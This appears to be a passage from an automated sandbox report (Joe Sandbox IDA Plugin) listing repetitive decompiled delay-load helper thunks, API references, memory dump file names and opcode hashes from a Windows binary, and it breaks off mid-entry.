                                                    • Opcode Fuzzy Hash: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                    • Instruction Fuzzy Hash: A5B012D535C248AC3144714E2D42C3B010CC0C0B28330403FFA05C83C1D8406C103932
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE1F6() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd2315c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                    • Instruction ID: 8c101ed0473f597e093d72fa7a866f0a20d50b8a6de4be5e3516e933685b9e89
                                                    • Opcode Fuzzy Hash: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                    • Instruction Fuzzy Hash: 9DB012D135C244AC3144720A2D02C3B010CC0C1B28330C03FFE09C83C1D840AC043432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDEAE7() {
                                                    
                                                    				E00CDE85D(0xcfc6cc, 0xd23034); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cdeaf9
                                                    0x00cdeb00

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDEAF9
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                    • Instruction ID: 432328b0a4afe5b72a2772755b63c1a1aed0d0fe886c9adb9b85d1ea6d8a9eb9
                                                    • Opcode Fuzzy Hash: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                    • Instruction Fuzzy Hash: D1B0928639A0967C2108B2052E42C360118C090B95320802BB604C8281988008012432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE282() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23124); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                    • Instruction ID: 98e1d1531db4a489c56d3a40a5c3688a3ddbaae7d986e228578123b867f628a7
                                                    • Opcode Fuzzy Hash: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                    • Instruction Fuzzy Hash: DBB012E135C154AC3144710A2E03C3B018CC0C0B28330403FFA05C83C1DC406D013432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE2B4() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23110); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 88049fb5cb3ef0c844e524b0bfd8999b9d703e757385206c9f5d9aa169f208cd
                                                    • Instruction ID: c5b8a2ff7090f4e19495ea40745722bf827f5dc1fa4199cdb3302b2796d8d5a3
                                                    • Opcode Fuzzy Hash: 88049fb5cb3ef0c844e524b0bfd8999b9d703e757385206c9f5d9aa169f208cd
                                                    • Instruction Fuzzy Hash: 62B012D135C144AC3144710A6D03C7B010CC0C0B28330443FFA05C83C1D8406C003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE246() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd2313c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                    • Instruction ID: 38709f3a1525955a5090fee80ce97513b68b79b595965d2b3fedc11caa7895bb
                                                    • Opcode Fuzzy Hash: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                    • Instruction Fuzzy Hash: 75B012D135D184AC3148710A2D02C3B010DC0C1B28330803FFE05C83C1D840AC403432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE250() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23138); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                    • Instruction ID: f97fd66f695532eb05434c82143a4933a4fa1caa00f77ffb861a854a69bf9435
                                                    • Opcode Fuzzy Hash: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                    • Instruction Fuzzy Hash: 3FB012E135D284BC3188720A2D02C3B010DC0C0B28330413FFA05C83C1D8406C443432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE26E() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd2312c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                    • Instruction ID: 54d91ef4607e92cc17a9debe6fed04dbb040e2aab48591c3f293e00d43f20e13
                                                    • Opcode Fuzzy Hash: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                    • Instruction Fuzzy Hash: 1AB012D135C154AC3144711A2D02C3B014CC0C1B28330803FFF05C83C1D840AC003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE264() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23130); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                    • Instruction ID: 210b3209b2953e72bdbdd12cac448a4a65eb3f3fd426ae025972661f6a2b3680
                                                    • Opcode Fuzzy Hash: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                    • Instruction Fuzzy Hash: C3B012D136D184AC3148710A2D02C3B014DC4C0B28330403FFA06C83C1D8406C003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE20A() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23154); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                    • Instruction ID: 68ad2d26d515abfb1113df245f46af68b0835b7b5727121a69d5c06e92129b8b
                                                    • Opcode Fuzzy Hash: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                    • Instruction Fuzzy Hash: 2FB012D135C244AC3144720A2E03C3B010CC0C0B28330803FFA09C83C1DC506D093432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE200() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23158); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                    • Instruction ID: f8ebe13bf0437518e251044e75e4b4b1b74865359203979adcbfb7aa4e50f3a9
                                                    • Opcode Fuzzy Hash: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                    • Instruction Fuzzy Hash: FEB012D135C384BC3184720A2D02C3B010CC0C0B28330813FFA09C83C1D8406C443432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE21E() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd2314c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                    • Instruction ID: 9112c38e77f2fb4c07a1a76bc15033dd5e2476c56a0965dca6cc3b7b70000c7e
                                                    • Opcode Fuzzy Hash: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                    • Instruction Fuzzy Hash: 8DB012E135C144BC3144710A2D02C3B010CC0C1F28330803FFF05C83C1D840AD003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE228() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23148); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                    • Instruction ID: 365084fa6e0ffa1b7dfce38b91089cf8a259de41ceb4874cd3a6bddbee0dc96b
                                                    • Opcode Fuzzy Hash: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                    • Instruction Fuzzy Hash: 52B012E135C284BC3184710A2D02C3B010CC0C0F28330413FFB05C83C1D8406D403432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE23C() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23140); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                    • Instruction ID: fcba007005f39ee154801e917e945b133638c910280025ad19bed176dec55e33
                                                    • Opcode Fuzzy Hash: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                    • Instruction Fuzzy Hash: 7DB012E135C144AC3144710B2D02C3B010CC0C0F28330403FFB05C83C1D8406D003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE232() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23144); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
